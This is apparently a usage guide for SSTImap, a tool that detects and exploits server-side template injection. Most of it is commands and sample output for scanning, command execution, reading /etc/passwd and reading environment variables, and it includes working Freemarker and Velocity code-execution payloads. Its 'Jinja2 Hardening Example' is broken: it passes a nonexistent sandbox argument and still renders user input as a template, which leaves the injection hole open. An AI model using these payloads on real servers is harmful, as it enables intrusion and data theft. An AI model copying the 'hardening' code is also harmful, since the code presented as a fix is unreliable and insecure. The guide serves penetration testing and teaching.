SSTImap

Overview

SSTImap is an automated security testing tool for detecting and exploiting Server-Side Template Injection (SSTI) vulnerabilities. It identifies template engines and attempts code execution to demonstrate impact of SSTI vulnerabilities.

Key Features

Automatic template engine detection
SSTI vulnerability scanning
Blind and non-blind exploitation
Multi-payload testing
Code execution capabilities
Request/response analysis
Vulnerability reporting
Cross-platform support

Important Notice

WARNING: SSTImap should ONLY be used:

In authorized penetration testing
With explicit written permission
On systems you own or control
In security research environments
For vulnerability assessment

Unauthorized testing is illegal and unethical.

Use Cases (Authorized)

Identify SSTI vulnerabilities in web applications
Test template engine security configurations
Verify vulnerability remediation
Security research and education
Penetration testing with authorization
Code execution impact demonstration

Installation

From GitHub

git clone https://github.com/vladimirmitin/sstimap.git
cd sstimap
chmod +x sstimap.py

Python Requirements

# Install dependencies
pip install requests

# Or with requirements file
pip install -r requirements.txt

Verify Installation

python sstimap.py -h

Docker Installation

docker pull sstimap:latest
docker run -it sstimap:latest -h

Basic Concepts

What is SSTI?

Server-Side Template Injection occurs when:

User input is embedded in template files
Templates are evaluated server-side
Insufficient input sanitization exists
Attacker can inject template directives

Common Vulnerable Templates

Engine	Language	Usage
Jinja2	Python	Flask, Django
Twig	PHP	Symfony
Freemarker	Java	Spring Boot
Velocity	Java	Various frameworks
Thymeleaf	Java	Spring
ERB	Ruby	Rails
Jade/Pug	Node.js	Express
EJS	Node.js	Express

Attack Payload Examples

Jinja2: {{7*7}}
Twig: {{7*7}}
Freemarker: <#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }
Velocity: #set($x='')#set($rt=$x.class.forName('java.lang.Runtime'))#set($chr=$x.class.forName('java.lang.Character'))#set($str=$x.class.forName('java.lang.String'))$rt.getRuntime().exec('command')

Installation and Setup

Full Installation

# Clone repository
git clone https://github.com/vladimirmitin/sstimap.git
cd sstimap

# Install dependencies
pip install -r requirements.txt

# Make executable
chmod +x sstimap.py

# Run help
./sstimap.py -h

Alternative: Python Package

pip install sstimap
sstimap.py -h

Basic Usage

Simple Vulnerability Scan

# Scan single URL
python sstimap.py -u "http://vulnerable-site.com/page?name=test"

# Output:
# [*] Testing server-side template injection
# [+] Jinja2 detected in: name parameter
# [+] Vulnerability confirmed

Scan with Custom Payload Parameter

# Test specific parameter
python sstimap.py -u "http://example.com/test?input=PAYLOAD" \
    --test-parameter "input"

Output to File

# Save results to file
python sstimap.py -u "http://example.com/?name=test" \
    -o results.txt

Verbose Output

# Enable verbose mode for detailed information
python sstimap.py -u "http://example.com/?name=test" \
    -v

Advanced Scanning

Template Engine Detection

# Detect template engine without exploitation
python sstimap.py -u "http://vulnerable-app.com/?search=test" \
    --detect-only

# Output shows:
# [+] Template engine: Jinja2
# [+] Injection point: search parameter

Test All Parameters

# Automatically test all GET/POST parameters
python sstimap.py -u "http://example.com/?id=1&name=test&type=prod" \
    --test-all-params

# Test for blind SSTI (time-based)
python sstimap.py -u "http://example.com/?input=test" \
    --detect-blind

# Introduces delays to detect processing

Custom Timeout

# Set custom timeout for responses
python sstimap.py -u "http://example.com/?id=test" \
    --timeout 10

Exploitation Techniques

Basic Code Execution

# Test basic math to confirm SSTI
python sstimap.py -u "http://vulnerable.com/?name=PAYLOAD" \
    --test-expression "7*7"

# Result should show: 49

Command Execution

# Execute OS command
python sstimap.py -u "http://example.com/?input=PAYLOAD" \
    --execute-command "id"

# Attempts: whoami, id, cat /etc/passwd, etc.

File Reading

# Read server files
python sstimap.py -u "http://example.com/?file=PAYLOAD" \
    --read-file "/etc/passwd"

# Or guess common file paths
python sstimap.py -u "http://example.com/?page=PAYLOAD" \
    --read-files

Database Interaction

# Attempt database access via template injection
python sstimap.py -u "http://vulnerable-app.com/?search=PAYLOAD" \
    --database

Request Configuration

Custom Headers

# Add authentication headers
python sstimap.py -u "http://example.com/?id=test" \
    -H "Authorization: Bearer TOKEN" \
    -H "User-Agent: Custom-Agent"

POST Data

# Test POST parameters
python sstimap.py -u "http://example.com/login" \
    --data "username=admin&password=test" \
    --test-parameter "password"

Cookies

# Include session cookies
python sstimap.py -u "http://example.com/?name=test" \
    --cookie "PHPSESSID=abcd1234; admin=false"

Proxy Configuration

# Route through proxy
python sstimap.py -u "http://example.com/?id=test" \
    --proxy "http://127.0.0.1:8080"

# For Burp Suite
python sstimap.py -u "http://example.com/?id=test" \
    --proxy "http://127.0.0.1:8080" \
    --ignore-proxy-warnings

SSL Verification

# Ignore SSL warnings (test environments)
python sstimap.py -u "https://example.com/?input=test" \
    --no-ssl-verify

Template Engine Specific Payloads

Jinja2 (Python)

# Test Jinja2
python sstimap.py -u "http://vulnerable.com/?name=PAYLOAD"

# Payloads tested:
# {{7*7}} -> 49
# {{config.items()}}
# {{request.environ}}

Twig (PHP)

# Twig injection test
python sstimap.py -u "http://vulnerable.com/?search=PAYLOAD"

# Payloads:
# {{7*7}} -> 49
# {{_self}}
# {{this.env}}

Freemarker (Java)

# Freemarker payload
python sstimap.py -u "http://vulnerable.com/?input=PAYLOAD"

# Freemarker RCE payload
# <#assign ex="freemarker.template.utility.Execute"?new()>${ex("whoami")}

Velocity (Java)

# Velocity injection
python sstimap.py -u "http://vulnerable.com/?id=PAYLOAD"

# Math expression: #set($x=7*7)$x

Thymeleaf (Java)

# Thymeleaf template injection
python sstimap.py -u "http://vulnerable.com/?name=PAYLOAD"

# Payload: [[${7*7}]]

Automation and Batch Testing

Scan Multiple URLs

# Test multiple endpoints
cat urls.txt | while read url; do
    python sstimap.py -u "$url" -o results_$(date +%s).txt
done

Bulk Parameter Testing

#!/bin/bash
# Test all parameters in URL list

while read url; do
    echo "Testing: $url"
    python sstimap.py -u "$url" \
        --test-all-params \
        -o results.txt
done < urls.txt

Automated Reporting

#!/bin/bash
# Generate report of findings

TARGET="http://vulnerable-app.com"
REPORT="ssti_report_$(date +%Y%m%d).txt"

echo "SSTI Vulnerability Assessment Report" > $REPORT
echo "Date: $(date)" >> $REPORT
echo "Target: $TARGET" >> $REPORT
echo "================================" >> $REPORT

# Test all discovered endpoints
python sstimap.py -u "$TARGET" \
    --test-all-params \
    -v >> $REPORT

echo "Report saved to: $REPORT"

Output Analysis

Understanding Output

[*] Testing server-side template injection
[+] Detected: Jinja2 in parameter 'name'
[*] Attempting exploitation...
[+] Payload: {{7*7}}
[+] Response: 49
[+] VULNERABILITY CONFIRMED
[*] Attempting code execution...
[+] Command output:
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

Parse Results Script

#!/bin/bash
# Extract vulnerable endpoints

python sstimap.py -u "http://target.com/?id=test" \
    --test-all-params -v 2>&1 | \
    grep -E "\[+\]|VULNERABLE" | \
    tee vulnerabilities.log

Exploitation Workflow

Step 1: Reconnaissance

# Map application parameters
python sstimap.py -u "http://target.com/?search=test&category=1" \
    --detect-only

Step 2: Template Detection

# Identify template engine
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
    --detect-template-engine

Step 3: Vulnerability Confirmation

# Confirm SSTI vulnerability
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
    --test-expression "7*7"

Step 4: Code Execution

# Execute commands
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
    --execute-command "id"

Step 5: Post-Exploitation

# Read sensitive files
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
    --read-file "/etc/passwd"

# Access environment variables
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
    --read-env

Integration with Other Tools

Burp Suite Integration

# Use SSTImap through Burp proxy
python sstimap.py -u "http://example.com/?param=test" \
    --proxy "http://127.0.0.1:8080"

# Intercept and modify requests in Burp
# Then test with SSTImap

OWASP ZAP Integration

# Export ZAP findings and test with SSTImap
python sstimap.py -u "http://example.com/?id=test" \
    --proxy "http://127.0.0.1:8090"

Metasploit Integration

# Use findings from SSTImap in Metasploit
# 1. Run SSTImap to identify SSTI
# 2. Use template-specific exploits in Metasploit
# 3. Gain shell access via template injection

Prevention and Mitigation

Secure Coding Practices

1. Input Validation
   - Whitelist allowed characters
   - Reject suspicious patterns
   - Length restrictions

2. Template Sandboxing
   - Use restricted templates
   - Disable dangerous functions
   - Limit object access

3. Context Separation
   - Don't mix code with templates
   - Use template escaping
   - Separate logic from presentation

4. Security Configuration
   - Disable debug mode in production
   - Restrict file access
   - Limit available functions

Jinja2 Hardening Example

from jinja2 import Environment, select_autoescape

# Create restricted environment
env = Environment(
    autoescape=select_autoescape(['html', 'xml']),
    sandbox=True  # Enable sandbox
)

# Disable dangerous filters
env.filters['unsafe'] = lambda x: x  # Don't use!

# Render safely
template = env.from_string(user_input)
result = template.render(safe_var=value)

Detection Patterns

Suspicious patterns to monitor:
- {{7*7}} responses as 49
- {%.*%} in requests
- Object access attempts
- File read attempts
- OS command patterns

Troubleshooting

Tool Not Finding Vulnerabilities

Issue: SSTI exists but SSTImap doesn’t detect it.

Solution:

# Try manual testing
python sstimap.py -u "http://example.com/?id=PAYLOAD" \
    -v

# Test with custom payload
python sstimap.py -u "http://example.com/?id=PAYLOAD" \
    --payload "{{7*7}}"

# Different parameter
python sstimap.py -u "http://example.com/?name=PAYLOAD" \
    --test-parameter "name"

Connection Issues

Issue: Unable to connect to target.

Solution:

# Test connectivity
curl http://target.com/?id=test

# Try with verbose
python sstimap.py -u "http://target.com/?id=test" \
    -v

# Use proxy if needed
python sstimap.py -u "http://target.com/?id=test" \
    --proxy "http://127.0.0.1:8080"

False Positives

Issue: Tool reports vulnerabilities that don’t exist.

Solution:

# Verify manually
# 1. Submit test payload: {{7*7}}
# 2. Check if response shows: 49
# 3. Confirm with different payloads

# Test with blind detection
python sstimap.py -u "http://target.com/?id=test" \
    --detect-blind

Security Considerations

Authorized Testing Only

Before testing:

✓ Obtain written authorization
✓ Define scope clearly
✓ Document test plan
✓ Get legal review
✓ Maintain confidentiality

Data Protection

# Encrypt sensitive findings
gpg -e -r recipient@company.com report.txt

# Secure deletion
shred -vfz report.txt

# Audit trail
echo "$(date): SSTI testing completed" >> audit.log

References

GitHub: vladimirmitin/sstimap
OWASP: Server-Side Template Injection
PortSwigger: SSTI Tutorial
CVE Database: Search SSTI vulnerabilities

Quick Reference

# Basic scan
python sstimap.py -u "http://vulnerable.com/?id=test"

# Detect template engine
python sstimap.py -u "http://vulnerable.com/?id=test" --detect-only

# Execute command
python sstimap.py -u "http://vulnerable.com/?id=test" --execute-command "id"

# Read file
python sstimap.py -u "http://vulnerable.com/?id=test" --read-file "/etc/passwd"

# Test all parameters
python sstimap.py -u "http://vulnerable.com/?a=1&b=2&c=3" --test-all-params

# Verbose output
python sstimap.py -u "http://vulnerable.com/?id=test" -v

# Save results
python sstimap.py -u "http://vulnerable.com/?id=test" -o results.txt

# With proxy
python sstimap.py -u "http://vulnerable.com/?id=test" --proxy "http://127.0.0.1:8080"

# Custom headers
python sstimap.py -u "http://vulnerable.com/?id=test" \
    -H "Authorization: Bearer TOKEN"

SSTImap

Overview

Key Features

Important Notice

Use Cases (Authorized)

Installation

From GitHub

Python Requirements

Verify Installation

Docker Installation

Basic Concepts

What is SSTI?

Common Vulnerable Templates

Attack Payload Examples

Installation and Setup

Full Installation

Alternative: Python Package

Basic Usage

Simple Vulnerability Scan

Scan with Custom Payload Parameter

Output to File

Verbose Output

Advanced Scanning

Template Engine Detection

Test All Parameters

Blind SSTI Detection

Custom Timeout

Exploitation Techniques

Basic Code Execution

Command Execution

File Reading

Database Interaction

Request Configuration

Custom Headers

POST Data

Cookies

Proxy Configuration

SSL Verification

Template Engine Specific Payloads

Jinja2 (Python)

Twig (PHP)

Freemarker (Java)

Velocity (Java)

Thymeleaf (Java)

Automation and Batch Testing

Scan Multiple URLs

Bulk Parameter Testing

Automated Reporting

Output Analysis

Understanding Output

Parse Results Script

Exploitation Workflow

Step 1: Reconnaissance

Step 2: Template Detection

Step 3: Vulnerability Confirmation

Step 4: Code Execution

Step 5: Post-Exploitation

Integration with Other Tools

Burp Suite Integration

OWASP ZAP Integration

Metasploit Integration

Prevention and Mitigation

Secure Coding Practices

Jinja2 Hardening Example

Detection Patterns

Troubleshooting

Tool Not Finding Vulnerabilities

Connection Issues

False Positives

Security Considerations

Authorized Testing Only

Data Protection

References

Quick Reference